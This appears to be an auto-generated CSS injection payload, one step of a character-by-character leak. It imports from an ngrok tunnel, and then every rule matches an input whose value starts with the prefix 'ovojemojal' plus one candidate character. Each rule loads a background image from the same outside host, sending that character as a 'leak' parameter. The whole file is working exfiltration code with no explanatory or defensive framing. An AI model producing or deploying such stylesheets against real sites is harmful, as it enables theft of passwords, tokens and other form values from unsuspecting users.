@import url("http://bc0a37bcf1d5.ngrok.io/?l=12");
input[value="ovojemojal!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.01849125601501611");}
input[value="ovojemojal\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.29841315657824374");}
input[value="ovojemojal#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.24685155968169514");}
input[value="ovojemojal$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.5474364672146084");}
input[value="ovojemojal%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.6113645226498496");}
input[value="ovojemojal&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.17589821029315145");}
input[value="ovojemojal'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.5560427913623285");}
input[value="ovojemojal("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.06672816789598301");}
input[value="ovojemojal)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.3563022816863166");}
input[value="ovojemojal*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.533473820386577");}
input[value="ovojemojal+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.5376099770490079");}
input[value="ovojemojal,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.6044369447675637");}
input[value="ovojemojal-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.8272761988746948");}
input[value="ovojemojal."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.19241202488943387");}
input[value="ovojemojal/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.4192825656021748");}
input[value="ovojemojal0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.8399813834414727");}
input[value="ovojemojal1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.018508476963889908");}
input[value="ovojemojal2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.6448581842281929");}
input[value="ovojemojal3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.9691018640734981");}
input[value="ovojemojal4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.7283784581724955");}
input[value="ovojemojal5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.22783195337465068");}
input[value="ovojemojal6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.9917812921667806");}
input[value="ovojemojal7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.4643353593008992");}
input[value="ovojemojal8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.32283964522449016");}
input[value="ovojemojal9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.0648961410675517");}
input[value="ovojemojal:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.6338126908880173");}
input[value="ovojemojal;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.040903621021545655");}
input[value="ovojemojal<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.1822442206337076");}
input[value="ovojemojal="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.9038992931053003");}
input[value="ovojemojal>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.6681046464039393");}
input[value="ovojemojal?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.7586753390256631");}
input[value="ovojemojal@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.8915563456775506");}
input[value="ovojemojalA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.5726261510601343");}
input[value="ovojemojalB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.390231508872825");}
input[value="ovojemojalC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.16022523119524235");}
input[value="ovojemojalD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.10139753596184309");}
input[value="ovojemojalE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.7303582754187561");}
input[value="ovojemojalF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.9942137462617562");}
input[value="ovojemojalG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.4453656450218002");}
input[value="ovojemojalH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.476682393975318");}
input[value="ovojemojalI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.5296588412791683");}
input[value="ovojemojalJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.9373243923398202");}
input[value="ovojemojalK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.5918055422560231");}
input[value="ovojemojalL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.6216206511490336");}
input[value="ovojemojalM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.7608853320283271");}
input[value="ovojemojalN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.48673160639698243");}
input[value="ovojemojalO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.6815029477039147");}
input[value="ovojemojalP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.6739715835954041");}
input[value="ovojemojalQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.02953683556755138");}
input[value="ovojemojalR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.022923635777462925");}
input[value="ovojemojalS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.9054702711373686");}
input[value="ovojemojalT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.05040777472516145");}
input[value="ovojemojalU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.4404716150000827");}
input[value="ovojemojalV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.4130122640129614");}
input[value="ovojemojalW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.6661375456544716");}
input[value="ovojemojalX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.4428377099214993");}
input[value="ovojemojalY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.20909697639184377");}
input[value="ovojemojalZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.00536182582662148");}
input[value="ovojemojal["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.6681548513360891");}
input[value="ovojemojal\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.7017136417169103");}
input[value="ovojemojal]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.007096848964673663");}
input[value="ovojemojal^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.029646549622023288");}
input[value="ovojemojal_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.37870163801168455");}
input[value="ovojemojal`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.3375220302884874");}
input[value="ovojemojala"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.8996653629086231");}
input[value="ovojemojalb"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.975024659374552");}
input[value="ovojemojalc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.4946306403431002");}
input[value="ovojemojald"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.14736465939077492");}
input[value="ovojemojale"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.9042664454448717");}
input[value="ovojemojalf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.9980840981881225");}
input[value="ovojemojalg"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.9716203373201246");}
input[value="ovojemojalh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.3702970326409196");}
input[value="ovojemojali"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.35815382188220624");}
input[value="ovojemojalj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.7293057127546132");}
input[value="ovojemojalk"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.5210016768347641");}
input[value="ovojemojall"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.2523685052073401");}
input[value="ovojemojalm"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.6237975463600895");}
input[value="ovojemojaln"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.5267065863872091");}
input[value="ovojemojalo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.09297392320616482");}
input[value="ovojemojalp"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.7858749289837537");}
input[value="ovojemojalq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.37980774894875524");}
input[value="ovojemojalr"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.6286638942124794");}
input[value="ovojemojals"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.541457381010803");}
input[value="ovojemojalt"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.7653799169655191");}
input[value="ovojemojalu"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.5832910677548335");}
input[value="ovojemojalv"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.31519609363968404");}
input[value="ovojemojalw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.8535677331515295");}
input[value="ovojemojalx"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.9338131354917658");}
input[value="ovojemojaly"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.6533310006116417");}
input[value="ovojemojalz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.7716028780769102");}
input[value="ovojemojal{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.8449999963636885");}
input[value="ovojemojal|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.5252616967429868");}
input[value="ovojemojal}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.853015922298642");}
input[value="ovojemojal~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.749785852656466");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9350896413578786");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.009253296474951433");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.023252134250726586");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.46790928702150825");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.45693433715400245");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7875210132869743");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9156859580182248");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.13705182171075636");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8901542439831365");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6109496154303946");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.19298547959122714");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4713394773193189");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.46542664505636644");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3743525270770922");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7018370274026131");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.49510599394873744");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.09121410098490079");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4382394989427463");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.11522415244273576");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.0290490825389631");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.14134040415248705");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8099503115110136");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.022225780302277398");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.18998766057756433");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9443254211688785");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.759397509207637");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8443678665407681");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5887607923396336");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2647264550239341");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.579895925444107");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.26146363389540994");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.31091962770056925");}
input[value="ovojemojal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3658044105799827");}
input[value="ovojemojal "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.029352075208695094");}
input[value="ovojemojal¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.04673154717705441");}
input[value="ovojemojal¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.3316064713002118");}
input[value="ovojemojal£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.41731093935083896");}
input[value="ovojemojal¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.7977720146444407");}
input[value="ovojemojal¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.33759971669664934");}
input[value="ovojemojal¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.5178244088326311");}
input[value="ovojemojal§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.31301651635907013");}
input[value="ovojemojal¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.9099260617470339");}
input[value="ovojemojal©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.8112127551633437");}
input[value="ovojemojalª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.8360735239338231");}
input[value="ovojemojal«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.6647101201793064");}
input[value="ovojemojal¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.9727597098361787");}
input[value="ovojemojal­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.6884134549855643");}
input[value="ovojemojal®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.936155172485589");}
input[value="ovojemojal¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.5604565507377495");}
input[value="ovojemojal°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.49284996126127467");}
input[value="ovojemojal±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.5605383361652081");}
input[value="ovojemojal²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.41750142166613746");}
input[value="ovojemojal³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.5002071580267464");}
input[value="ovojemojal´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.9484905163862163");}
input[value="ovojemojalµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.3527742826584539");}
input[value="ovojemojal¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.16567122422724823");}
input[value="ovojemojal·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.013342172810949071");}
input[value="ovojemojal¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.046933078257831884");}
input[value="ovojemojal¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.424287017446894");}
input[value="ovojemojalº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.25998939738815663");}
input[value="ovojemojal»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.04425946166095707");}
input[value="ovojemojal¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.8458328159377893");}
input[value="ovojemojal½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.9327314033354");}
input[value="ovojemojal¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.12077354972093057");}
input[value="ovojemojal¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.8333694473641808");}
input[value="ovojemojalÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.3556658833903199");}
input[value="ovojemojalÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.1634887038340258");}
input[value="ovojemojalÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.249020365177258");}
input[value="ovojemojalÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.5497897312243363");}
input[value="ovojemojalÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.4012485224898612");}
input[value="ovojemojalÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.6643028428799158");}
input[value="ovojemojalÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.49396195573046664");}
input[value="ovojemojalÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.4428351391433041");}
input[value="ovojemojalÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.7853116704361587");}
input[value="ovojemojalÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.881784843807943");}
input[value="ovojemojalÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.5089098005524086");}
input[value="ovojemojalË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.4325071773700855");}
input[value="ovojemojalÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.6422828755350629");}
input[value="ovojemojalÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.2736425163170988");}
input[value="ovojemojalÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.6794841371898548");}
input[value="ovojemojalÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.3565106426402298");}
input[value="ovojemojalÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.4776450898830158");}
input[value="ovojemojalÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.23132978192244846");}
input[value="ovojemojalÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.5926875057740943");}
input[value="ovojemojalÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.5618509486534111");}
input[value="ovojemojalÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.7126861525804393");}
input[value="ovojemojalÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.21031001841350117");}
input[value="ovojemojalÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.498404741646419");}
input[value="ovojemojal×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.11624815109648634");}
input[value="ovojemojalØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.42286288156842544");}
input[value="ovojemojalÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.5756045288747194");}
input[value="ovojemojalÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.5879192859078537");}
input[value="ovojemojalÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.5412030920582536");}
input[value="ovojemojalÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.902251951075425");}
input[value="ovojemojalÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.22926129071653922");}
input[value="ovojemojalÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.1847269702230121");}
input[value="ovojemojalß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.22739521905893523");}
input[value="ovojemojalà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.5681628601484812");}
input[value="ovojemojalá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.014480733594258055");}
input[value="ovojemojalâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.8520174731925518");}
input[value="ovojemojalã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.1418051462833616");}
input[value="ovojemojalä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.8830846147288127");}
input[value="ovojemojalå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.5102314071255423");}
input[value="ovojemojalæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.3062813702345559");}
input[value="ovojemojalç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.25222724414459474");}
input[value="ovojemojalè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.9361539523772648");}
input[value="ovojemojalé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.24473971716462373");}
input[value="ovojemojalê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.7229796698221416");}
input[value="ovojemojalë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.35499568264171133");}
input[value="ovojemojalì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.9592646866789032");}
input[value="ovojemojalí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.829939215998738");}
input[value="ovojemojalî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.9728555815714894");}
input[value="ovojemojalï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.31825230152399664");}
input[value="ovojemojalð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.38817540517751925");}
input[value="ovojemojalñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.36145337582344816");}
input[value="ovojemojalò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.6484168815815265");}
input[value="ovojemojaló"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.5540596588650544");}
input[value="ovojemojalô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.9921070230378537");}
input[value="ovojemojalõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.0827833800362121");}
input[value="ovojemojalö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.4509932224739379");}
input[value="ovojemojal÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.6731886474501623");}
input[value="ovojemojalø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.620691743593724");}
input[value="ovojemojalù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.20690089164976344");}
input[value="ovojemojalú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.7009222937332134");}
input[value="ovojemojalû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.5007544755877338");}
input[value="ovojemojalü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.13207038379778102");}
input[value="ovojemojalý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.24281396266275213");}
input[value="ovojemojalþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.7901818559653728");}
input[value="ovojemojalÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.3083781315979728");}
